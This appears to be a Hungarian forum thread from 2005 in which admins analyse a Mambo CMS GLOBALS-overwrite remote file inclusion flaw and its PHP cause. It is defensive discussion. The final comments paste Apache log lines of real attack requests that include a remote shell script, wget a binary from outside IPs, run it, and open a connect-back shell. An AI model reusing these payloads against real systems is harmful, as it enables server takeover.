- A hozzászóláshoz be kell jelentkezni
- 7222 megtekintés
Hozzászólások
Sajnos, a "visszaper" karakterek lemaradtak (a sorok végén lettek volna). Hasonlóan lemaradt a PHP kód elejéről a "kisebb jel" "kérdőjel" php fejléc.
- A hozzászóláshoz be kell jelentkezni
Ha jól értelmezem a dolgot, akkor ehhez a sebezhetőséghez a szerveren a register_globals-nak be kell kapcsolva lennie, különben nem tudod "felülirni" a változókat. Szerintem első körben ezt kellene kikapcsolni, bár sok helyen nem lehetséges még(régi kódok miatt).
Nem biztos, hogy ez a hiba, nem próbáltam ki.
- A hozzászóláshoz be kell jelentkezni
Sajnos valóban sok helyen még register_globals on módban fut a php. Ezen felül persze rengeteg más gyengesége lehet egy php/webserver konfigurációnak.
Egyébként pedig van mód a működést befolyásolni többféleképpen is(.htaccess file-lal, ez kicsit megint biztonsági veszélyt jelent; vagy az extract(), foreach(), unset() és barátai segítségével is elérhető egy register_globals off vagy on állapot)
- A hozzászóláshoz be kell jelentkezni
Ha jól látom allow_url_fopen szintén kell hozzá, amit szvsz jobb eleve tiltani. Szintén kell open_basedir hiány hozzá.
- A hozzászóláshoz be kell jelentkezni
Ezert hasznalok mod-security-t :))
- A hozzászóláshoz be kell jelentkezni
Ez ellen milyen rule véd, amíg még a hibát neme ismered?
- A hozzászóláshoz be kell jelentkezni
Akkor neked abban kell reménykedned, hogy a ModSecurity-ben lévő biztonsági hibákat senki sem használja ki a gépeden... ;P
- A hozzászóláshoz be kell jelentkezni
ez a hiba mar par hete megy a webappsec levlistan, onnan szedtem ezt a linket:
http://seclists.org/lists/fulldisclosure/2005/Nov/0528.html
elvileg ezt a hibat hasznalja ki a script. itt viszont eppen azt irjak hogy register_globals OFF eseten sebezheto a mambo.
- A hozzászóláshoz be kell jelentkezni
Megnéztem a linket, utána olvastam a forráskódban, szerintem nincsen hiba (és még mindig nincsen mambo.txt-nk :))
Elvileg minden php kód futtatása csak az index.php-n keresztül történhet. A globals.php beinclude-olása után a configurations.php-t include-olja be, ahol elvileg felül kellene irnia a $GLOBALS['mosConfig_absolute_path'] változót.
Tehát nem értem, mert ha a szőnyegbombázás létezik, akkor a hibát is ki lehet használni...
- A hozzászóláshoz be kell jelentkezni
Megvan, ez inkabb php hibának tűnik:
$GLOBALS["GLOBALS"] = "";
$GLOBALS["almafa"] = "kortefa";
$almafa = "barackfa";
echo $GLOBALS["almafa"];
Azt irja ki, hogy kortefa, mig az első sor nélkül azt, hogy barackfa. Tehát a hiba igazából ott van, hogy hagyja kinullázni a GLOBALS tömböt.
A barackfa lenne a biztonságos megoldás, a kortefa-val törhetőek ténylegesen a mambok.
A PHP dokumentációjában nem sok információt találtam arról, hogy a GLOBALS felülirása esetén miért vannak ilyen gondok...
- A hozzászóláshoz be kell jelentkezni
Igen, a mambosok is igy gondoljak:
http://forum.mamboserver.com/showthread.php?t=66154
- A hozzászóláshoz be kell jelentkezni
ezt pl nezem: cd%20/tmp/
- A hozzászóláshoz be kell jelentkezni
Meg mindig jobban jarok, mintha a KispistaCMS hibai miatt kene naponta takaritanom :P Amugy milyen modsecurity hibarol tudsz perpill? :))
- A hozzászóláshoz be kell jelentkezni
Nekem 1 hónapja vannak ilyenek az apache logban:
202.83.220.135 - - [18/Dec/2005:13:36:44 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]
=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/
listen;chmod%20744%20listen;./listen;echo%20YYY;echo| HTTP/1.1" 404 282
- A hozzászóláshoz be kell jelentkezni
Pl valamelyik változó (paraméter) értéke http://-vel kezdődik. Én ezt nézem.
- A hozzászóláshoz be kell jelentkezni
Régebben is próbálkoztak, csak akkor még nem ezzel a szkripttel:
web.spin.it - - [25/Nov/2005:18:44:38 +0100] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]
=com_
content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
http://195.120.109.25/cmd.gif?&cmd=cd%20/tmp;wget%20217.160.255.44
/cback;chmod%20744%20cback;./cback%20194.112.220.37%208080;echo%20YYY;
echo| HTTP/1.1" 404 216 "-" "Mozilla/4.0 (compatible; M
SIE 6.0; Windows NT 5.1;)"
- A hozzászóláshoz be kell jelentkezni